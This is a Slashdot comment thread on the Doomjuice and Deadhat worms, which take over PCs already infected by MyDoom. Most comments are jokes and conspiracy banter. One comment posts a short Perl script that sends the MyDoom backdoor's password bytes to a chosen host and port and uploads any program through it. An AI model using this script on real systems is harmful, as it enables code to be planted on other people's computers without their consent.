New Worms Feed on MyDoom Infections
JJP writes "ZDNet Australia is reporting that two new worms, Doomjuice and Deadhat, are taking over computers previously infected by the MyDoom virus.
Apparently they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work. Whilst the threat these two worms pose shouldn't be too big, both needing a MyDoom backdoor, it is still a novel way to spread a virus. In the Netherlands there is a newspaper reporting this proves MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."
I hear those are safe too.. and just as useful to me in my busniess as a Mac.
Hmm, it "proofs" eh? Maybe we could get it installed on slashdot to proof all stories as they're posted. :)
Is that the new BSD release?
Maybe Red Hat or Apple paid for the *virus*. :-)
--- Ban humanity.
No proof yet... BBC says MyDoom spread by Linux users to hurt SCO, Linux users say MyDoom spread by spammers to hurt everyone, spammers say MyDoom spread by BIGGER PENIS NOW... Who to believe?
this proofs MyDoom was initialy spread by organised crime. . .
:-P
I think it "proofs" that the editors don't proofread the submissions.
Here's an idea..
Next time, if you're going to post a link that you have to register for, at least make sure it's in english.
In other news, by looking at the same day's news from the Netherlands, you'll see they just released "Deus Ex" and "Deus Ex: Invisible War." Conspiracy Theories have quadrupled since.
Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
I hate it when those sneaky Windows worms pose as threads, it makes em that much harder to catch.
... the now defunct "RedHat" Linux distro?
:/
Way to go on damming Linux users reputation
Do you think people come up with a clever virus name or the virus first?
When are the nation states going to wake up and start an international war against spam?
When the spammers have oil.
Could please someone find their owners and make sure they never get to operate a computer connected to a public network again? They have clearly shown not to be qualified, and are a threat to others.
Programming can be fun again. Film at 11.
Maybe these guys should just start hard rock bands: MyDoom, DoomJuice, DeadHat... It's like when I worked at LaserQuest and had to listen to all the stupid ideas kids had for their codenames.
What's next, ThunderCat? MrDoom? Anyone smart enough to write a virus this effective must be more imaginative than this!
I am willing to admit that SCO is a crime, but who is claiming that they are organized??
I think I would be willing to admit that it was spread by a criminal comany.
Great civilizations have lived and died on false theories. Don't mess up mine with a few facts.
My Windows box is much better than some stupid ol' Mac. My system installs software ALL ON ITS OWN! Heh, yeah. This software makes my system do things I couldn't have done even if I tried...like sending mail to a bunch of people I haven't even met.
:-P
My system is part of a new global network. Your Mac just sits there and runs.
... the editors don't proveread.
MyDoom: "Who are you?"
DoomJuice: "I'm your Grim Reaper."
MyDoom: "Like hell you are. This is my machine, punk."
DoomJuice: "Prepare to meet thy maker (wink wink)."
MyDoom: "Over my dead process."
DoomJuice: "Look, a little old lady on a Windows 98 machine!"
MyDoom: (turns) "Who? Where?"
DoomJuice: "Your Mom." *BONK* "Muhahahaha! Mine, the world is mine!"
+1 Insightful, -1 Troll. What can I say, I'm an Insightful Troll.
Etch-A-Sketch... "You shake it to reboot" - Dilbert
#!/usr/bin/perl -w
use IO::Socket;
use strict;
if(@ARGV < 3) {
print "****** Usage: $0 \<ip\> \<port\> \<program to upload\> ****\n";
exit -1;
}
my ( $host, $port, $exe ) = ($ARGV[0], $ARGV[1], $ARGV[2]);
my $doompass = "\x85\x13\x3c\x9e\xa2";
my $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) or die "cannot open socket: $!";
print $socket $doompass;
open(INPUT, $exe) || die "Can't open: $!";
while (<INPUT>){
print $socket $_;
}
close(INPUT) || die "Can't close: $!";
superman runs linux
So, naturalists observe, a flea
Hath smaller fleas that on him prey;
And these have smaller still to bite 'em;
And so proceed ad infinitum.
I have owned the deadhat.com domain for a few years now. It is a simple pun on RedHat and the site is of interest to a very limited group of people.
I am not at all happy that someone has sullied the good name of my website with a worm.
Evil people are out to get you.